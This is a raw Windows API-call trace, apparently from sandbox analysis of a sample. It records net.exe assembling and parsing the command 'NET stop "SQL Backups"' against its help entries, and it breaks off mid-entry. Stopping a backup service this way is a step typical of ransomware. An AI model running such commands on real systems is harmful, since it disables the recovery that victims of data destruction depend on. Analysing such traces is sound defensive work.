[0214.686] _wcsicmp (_String1="WORK", _String2="ΓÇ£SQL") returned -828 [0214.686] _wcsicmp (_String1="WORK", _String2="BackupsΓÇ¥") returned 21 [0214.686] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" WKSTA" [0214.686] wcsspn (_String=" WKSTA", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0214.686] _wcsicmp (_String1="WKSTA", _String2="stop") returned 4 [0214.686] _wcsicmp (_String1="WKSTA", _String2="ΓÇ£SQL") returned -828 [0214.686] _wcsicmp (_String1="WKSTA", _String2="BackupsΓÇ¥") returned 21 [0214.686] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" PRDR" [0214.686] wcsspn (_String=" PRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0214.686] _wcsicmp (_String1="PRDR", _String2="stop") returned -3 [0214.686] _wcsicmp (_String1="PRDR", _String2="ΓÇ£SQL") returned -835 [0214.686] _wcsicmp (_String1="PRDR", _String2="BackupsΓÇ¥") returned 14 [0214.686] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" DEVRDR" [0214.686] wcsspn (_String=" DEVRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0214.686] _wcsicmp (_String1="DEVRDR", _String2="stop") returned -15 [0214.686] _wcsicmp (_String1="DEVRDR", _String2="ΓÇ£SQL") returned -847 [0214.686] _wcsicmp (_String1="DEVRDR", _String2="BackupsΓÇ¥") returned 2 [0214.686] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0214.686] wcstok (in: _String="\r\nSERVER: SVR, SRV", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSERVER", _Context=0x3d6) returned="\r\nSERVER" [0214.686] wcsspn (_String="\r\nSERVER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0214.686] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SVR" [0214.686] wcsspn (_String=" SVR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0214.686] _wcsicmp (_String1="SVR", _String2="stop") returned 2 [0214.686] _wcsicmp (_String1="SVR", _String2="ΓÇ£SQL") returned -832 [0214.687] _wcsicmp (_String1="SVR", _String2="BackupsΓÇ¥") returned 17 [0214.687] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SRV" [0214.687] wcsspn (_String=" SRV", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0214.687] _wcsicmp (_String1="SRV", _String2="stop") returned -2 [0214.687] _wcsicmp (_String1="SRV", _String2="ΓÇ£SQL") returned -832 [0214.687] _wcsicmp (_String1="SRV", _String2="BackupsΓÇ¥") returned 17 [0214.687] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0214.687] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc67, dwLanguageId=0x0, lpBuffer=0x26f2c0, nSize=0x0, Arguments=0x26f2bc | out: lpBuffer="㻠,ꔺ瓡") returned 0x1c [0214.687] wcstok (in: _String="NAMES$\r\nSYNTAX$\r\nSERVICES$\r\n", _Delimiter="$", _Context=0x3d6 | out: _String="NAMES", _Context=0x3d6) returned="NAMES" [0214.687] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSYNTAX" [0214.687] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSERVICES" [0214.687] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\n" [0214.687] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0214.687] wcsspn (_String="NAMES", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0214.687] _wcsicmp (_String1="stop", _String2="NAMES") returned 5 [0214.687] wcsspn (_String="\r\nSYNTAX", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0214.687] _wcsicmp (_String1="stop", _String2="SYNTAX") returned -5 [0214.687] wcsspn (_String="\r\nSERVICES", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0214.687] _wcsicmp (_String1="stop", _String2="SERVICES") returned 15 [0214.687] wcscpy_s (in: _Destination=0x6da4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0214.687] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a00000 [0214.688] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a00000, dwMessageId=0x111d, dwLanguageId=0x0, lpBuffer=0x6db338, nSize=0x800, Arguments=0x6d9dd8 | out: lpBuffer="The syntax of this command is:\r\n") returned 0x20 [0214.689] GetFileType (hFile=0x26c) returned 0x3 [0214.689] LocalAlloc (uFlags=0x0, uBytes=0x40) returned 0x2c41b0 [0214.689] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The syntax of this command is:\r\n", cchWideChar=32, lpMultiByteStr=0x2c41b0, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The syntax of this command is:\r\n", lpUsedDefaultChar=0x0) returned 32 [0214.689] WriteFile (in: hFile=0x26c, lpBuffer=0x2c41b0, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26f2a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x26f2a0, lpOverlapped=0x0) returned 0 [0214.689] LocalFree (hMem=0x2c41b0) returned 0x0 [0214.689] GetFileType (hFile=0x26c) returned 0x3 [0214.689] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2c3d40 [0214.689] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x2c3d40, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n,", lpUsedDefaultChar=0x0) returned 2 [0214.689] WriteFile (in: hFile=0x26c, lpBuffer=0x2c3d40, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x26f2a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x26f2a0, lpOverlapped=0x0) returned 0 [0214.689] LocalFree (hMem=0x2c3d40) returned 0x0 [0214.689] wcscpy_s (in: _Destination=0x26f358, _SizeInWords=0x200, _Source="NET" | out: _Destination="NET") returned 0x0 [0214.689] wcsncat_s (in: _Destination="NET", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET ") returned 0x0 [0214.689] wcsncat_s (in: _Destination="NET ", _SizeInWords=0x200, _Source="stop", _MaxCount=0xffffffff | out: _Destination="NET stop") returned 0x0 [0214.689] wcsncat_s (in: _Destination="NET stop", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ") returned 0x0 [0214.689] wcsncat_s (in: _Destination="NET stop ", _SizeInWords=0x200, _Source="ΓÇ£SQL", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£SQL") returned 0x0 [0214.689] wcsncat_s (in: _Destination="NET stop ΓÇ£SQL", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£SQL ") returned 0x0 [0214.689] wcsncat_s (in: _Destination="NET stop ΓÇ£SQL ", _SizeInWords=0x200, _Source="BackupsΓÇ¥", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£SQL BackupsΓÇ¥") returned 0x0 [0214.689] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="堘,댸m&Ѱmɬ") returned 0xad [0214.689] _wcsnicmp (_String1="NET stop ΓÇ£SQL BackupsΓÇ¥", _String2="NET ACCOUNTS\r\n[/FORCELOGOF", _MaxCount=0x1a) returned 18 [0214.689] LocalFree (hMem=0x2c5818) returned 0x0 [0214.689] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&堘,&") returned 0x2e [0214.689] _wcsnicmp (_String1="NET stop ΓÇ£SQL BackupsΓÇ¥", _String2="NET COMPUTER\r\n\\\\computerna", _MaxCount=0x1a) returned 16 [0214.689] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.689] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="堘,⡋瓢&㼨,&") returned 0x7d [0214.690] _wcsnicmp (_String1="NET stop ΓÇ£SQL BackupsΓÇ¥", _String2="NET CONFIG SERVER\r\n[/AUTOD", _MaxCount=0x1a) returned 16 [0214.690] LocalFree (hMem=0x2c5818) returned 0x0 [0214.690] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&堘,&") returned 0x26 [0214.690] _wcsnicmp (_String1="NET stop ΓÇ£SQL BackupsΓÇ¥", _String2="NET CONFIG\r\n[SERVER | WORK", _MaxCount=0x1a) returned 16 [0214.690] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.690] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&㼨,&") returned 0x19 [0214.690] _wcsnicmp (_String1="NET stop ΓÇ£SQL BackupsΓÇ¥", _String2="NET CONTINUE\r\nservice\r\n\r\n", _MaxCount=0x1a) returned 16 [0214.690] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.690] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&㼨,&") returned 0x1b [0214.690] _wcsnicmp (_String1="NET stop ΓÇ£SQL BackupsΓÇ¥", _String2="NET FILE\r\n[id [/CLOSE]]\r\n\r", _MaxCount=0x1a) returned 13 [0214.690] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.690] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="堘,⡋瓢&㼨,&") returned 0xbe [0214.690] _wcsnicmp (_String1="NET stop ΓÇ£SQL BackupsΓÇ¥", _String2="NET GROUP\r\n[groupname [/CO", _MaxCount=0x1a) returned 12 [0214.690] LocalFree (hMem=0x2c5818) returned 0x0 [0214.690] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&堘,&") returned 0x33 [0214.690] _wcsnicmp (_String1="NET stop ΓÇ£SQL BackupsΓÇ¥", _String2="NET HELP\r\ncommand\r\n -o", _MaxCount=0x1a) returned 11 [0214.690] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.690] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&㼨,&") returned 0x19 [0214.690] _wcsnicmp (_String1="NET stop ΓÇ£SQL BackupsΓÇ¥", _String2="NET HELPMSG\r\nmessage#\r\n\r\n", _MaxCount=0x1a) returned 11 [0214.690] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.690] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="堘,⡋瓢&㼨,&") returned 0xc1 [0214.690] _wcsnicmp (_String1="NET stop ΓÇ£SQL BackupsΓÇ¥", _String2="NET LOCALGROUP\r\n[groupname", _MaxCount=0x1a) returned 7 [0214.690] LocalFree (hMem=0x2c5818) returned 0x0 [0214.690] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&堘,&") returned 0x16 [0214.690] _wcsnicmp (_String1="NET stop ΓÇ£SQL BackupsΓÇ¥", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x1a) returned 3 [0214.690] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.691] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&㼨,&") returned 0x33 [0214.691] _wcsnicmp (_String1="NET stop ΓÇ£SQL BackupsΓÇ¥", _String2="NET SESSION\r\n[\\\\computerna", _MaxCount=0x1a) returned 15 [0214.691] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.691] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="堘,⡋瓢&㼨,&") returned 0x234 [0214.691] _wcsnicmp (_String1="NET stop ΓÇ£SQL BackupsΓÇ¥", _String2="NET SHARE\r\nsharename\r\n ", _MaxCount=0x1a) returned 12 [0214.691] LocalFree (hMem=0x2c5818) returned 0x0 [0214.691] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&堘,&") returned 0x13 [0214.691] _wcsnicmp (_String1="NET stop ΓÇ£SQL BackupsΓÇ¥", _String2="NET START BROWSER\r\n", _MaxCount=0x1a) returned 14 [0214.691] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.691] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&㼨,&") returned 0x14 [0214.691] _wcsnicmp (_String1="NET stop ΓÇ£SQL BackupsΓÇ¥", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x1a) returned 14 [0214.691] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.691] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&㼨,&") returned 0x14 [0214.691] _wcsnicmp (_String1="NET stop ΓÇ£SQL BackupsΓÇ¥", _String2="NET START EVENTLOG\r\n", _MaxCount=0x1a) returned 14 [0214.691] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.691] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&㼨,&") returned 0x15 [0214.691] _wcsnicmp (_String1="NET stop ΓÇ£SQL BackupsΓÇ¥", _String2="NET START MESSENGER\r\n", _MaxCount=0x1a) returned 14 [0214.691] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.691] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&㼨,&") returned 0x15 [0214.691] _wcsnicmp (_String1="NET stop ΓÇ£SQL BackupsΓÇ¥", _String2="NET START NET LOGON\r\n", _MaxCount=0x1a) returned 14 [0214.691] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.691] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&㼨,&") returned 0x16 [0214.691] _wcsnicmp (_String1="NET stop ΓÇ£SQL BackupsΓÇ¥", _String2="NET START RPCLOCATOR\r\n", _MaxCount=0x1a) returned 14 [0214.691] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.692] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&㼨,&") returned 0x11 [0214.692] _wcsnicmp (_String1="NET stop ΓÇ£SQL BackupsΓÇ¥", _String2="NET START RPCSS\r\n", _MaxCount=0x1a) returned 14 [0214.692] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.692] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&㼨,&") returned 0x14 [0214.692] _wcsnicmp (_String1="NET stop ΓÇ£SQL BackupsΓÇ¥", _String2="NET START SCHEDULE\r\n", _MaxCount=0x1a) returned 14 [0214.692] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.692] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&㼨,&") returned 0x12 [0214.692] _wcsnicmp (_String1="NET stop ΓÇ£SQL BackupsΓÇ¥", _String2="NET START SERVER\r\n", _MaxCount=0x1a) returned 14 [0214.692] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.692] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&㼨,&") returned 0xf [0214.692] _wcsnicmp (_String1="NET stop ΓÇ£SQL BackupsΓÇ¥", _String2="NET START UPS\r\n", _MaxCount=0x1a) returned 14 [0214.692] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.692] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&㼨,&") returned 0x17 [0214.692] _wcsnicmp (_String1="NET stop ΓÇ£SQL BackupsΓÇ¥", _String2="NET START WORKSTATION\r\n", _MaxCount=0x1a) returned 14 [0214.692] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.692] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&㼨,&") returned 0x18 [0214.692] _wcsnicmp (_String1="NET stop ΓÇ£SQL BackupsΓÇ¥", _String2="NET START\r\n[service]\r\n\r\n", _MaxCount=0x1a) returned 14 [0214.692] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.692] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&㼨,&") returned 0x2a [0214.692] _wcsnicmp (_String1="NET stop ΓÇ£SQL BackupsΓÇ¥", _String2="NET STATISTICS\r\n[WORKSTATI", _MaxCount=0x1a) returned 14 [0214.692] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.692] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&㼨,&") returned 0x15 [0214.692] _wcsnicmp (_String1="NET stop ΓÇ£SQL BackupsΓÇ¥", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x1a) returned 19 [0214.692] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.692] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="堘,⡋瓢&㼨,&") returned 0x58 [0214.692] _wcsnicmp (_String1="NET stop ΓÇ£SQL BackupsΓÇ¥", _String2="NET TIME\r\n\r\n[\\\\computernam", _MaxCount=0x1a) returned -1 [0214.692] LocalFree (hMem=0x2c5818) returned 0x0 [0214.692] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="堘,⡋瓢&堘,&") returned 0x184 [0214.692] _wcsnicmp (_String1="NET stop ΓÇ£SQL BackupsΓÇ¥", _String2="NET USE\r\n[devicename | *] ", _MaxCount=0x1a) returned -2 [0214.692] LocalFree (hMem=0x2c5818) returned 0x0 [0214.692] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="堘,⡋瓢&堘,&") returned 0xc7 [0214.692] _wcsnicmp (_String1="NET stop ΓÇ£SQL BackupsΓÇ¥", _String2="NET USER\r\n[username [passw", _MaxCount=0x1a) returned -2 [0214.692] LocalFree (hMem=0x2c5818) returned 0x0 [0214.692] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="堘,⡋瓢&堘,&") returned 0x47 [0214.692] _wcsnicmp (_String1="NET stop ΓÇ£SQL BackupsΓÇ¥", _String2="NET VIEW\r\n[\\\\computername ", _MaxCount=0x1a) returned -3 [0214.692] LocalFree (hMem=0x2c5818) returned 0x0 [0214.693] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="堘,⡋瓢&堘,&") returned 0xc2 [0214.693] _wcsnicmp (_String1="NET stop ΓÇ£SQL BackupsΓÇ¥", _String2="NET\r\n [ ACCOUNTS | COMP", _MaxCount=0x1a) returned 19 [0214.693] LocalFree (hMem=0x2c5818) returned 0x0 [0214.693] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="堘,⡋瓢&堘,&") returned 0x319 [0214.693] _wcsnicmp (_String1="NET stop ΓÇ£SQL BackupsΓÇ¥", _String2="SERVICES\r\nNET START can be", _MaxCount=0x1a) returned -5 [0214.693] LocalFree (hMem=0x2c5818) returned 0x0 [0214.693] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="堘,⡋瓢&堘,&") returned 0x483 [0214.693] _wcsnicmp (_String1="NET stop ΓÇ£SQL BackupsΓÇ¥", _String2="SYNTAX\r\nThe following conv", _MaxCount=0x1a) returned -5 [0214.693] LocalFree (hMem=0x2c5818) returned 0x0 [0214.693] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="堘,⡋瓢&堘,&") returned 0xa86 [0214.693] _wcsnicmp (_String1="NET stop ΓÇ£SQL BackupsΓÇ¥", _String2="NAMES\r\nThe following types", _MaxCount=0x1a) returned 4 [0214.693] LocalFree (hMem=0x2c5818) returned 0x0 [0214.693] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="堘,⡋瓢&堘,&") returned 0x54 [0214.693] _wcsnicmp (_String1="NET stop ΓÇ£SQL BackupsΓÇ¥", _String2="\r\nFor more information on ", _MaxCount=0x1a) returned 97 [0214.693] LocalFree (hMem=0x2c5818) returned 0x0 [0214.693] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="堘,⡋瓢&堘,&") returned 0xad [0214.693] _wcsnicmp (_String1="NET stop ΓÇ£SQL", _String2="NET ACCOUNTS\r\n[", _MaxCount=0xf) returned 18 [0214.693] LocalFree (hMem=0x2c5818) returned 0x0 [0214.693] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&堘,&") returned 0x2e [0214.693] _wcsnicmp (_String1="NET stop ΓÇ£SQL", _String2="NET COMPUTER\r\n\\", _MaxCount=0xf) returned 16 [0214.693] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.693] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="堘,⡋瓢&㼨,&") returned 0x7d [0214.693] _wcsnicmp (_String1="NET stop ΓÇ£SQL", _String2="NET CONFIG SERV", _MaxCount=0xf) returned 16 [0214.693] LocalFree (hMem=0x2c5818) returned 0x0 [0214.693] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&堘,&") returned 0x26 [0214.694] _wcsnicmp (_String1="NET stop ΓÇ£SQL", _String2="NET CONFIG\r\n[SE", _MaxCount=0xf) returned 16 [0214.694] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.694] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&㼨,&") returned 0x19 [0214.694] _wcsnicmp (_String1="NET stop ΓÇ£SQL", _String2="NET CONTINUE\r\ns", _MaxCount=0xf) returned 16 [0214.694] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.694] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&㼨,&") returned 0x1b [0214.694] _wcsnicmp (_String1="NET stop ΓÇ£SQL", _String2="NET FILE\r\n[id [", _MaxCount=0xf) returned 13 [0214.694] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.694] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="堘,⡋瓢&㼨,&") returned 0xbe [0214.694] _wcsnicmp (_String1="NET stop ΓÇ£SQL", _String2="NET GROUP\r\n[gro", _MaxCount=0xf) returned 12 [0214.694] LocalFree (hMem=0x2c5818) returned 0x0 [0214.694] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&堘,&") returned 0x33 [0214.694] _wcsnicmp (_String1="NET stop ΓÇ£SQL", _String2="NET HELP\r\ncomma", _MaxCount=0xf) returned 11 [0214.694] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.694] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&㼨,&") returned 0x19 [0214.694] _wcsnicmp (_String1="NET stop ΓÇ£SQL", _String2="NET HELPMSG\r\nme", _MaxCount=0xf) returned 11 [0214.694] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.694] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: 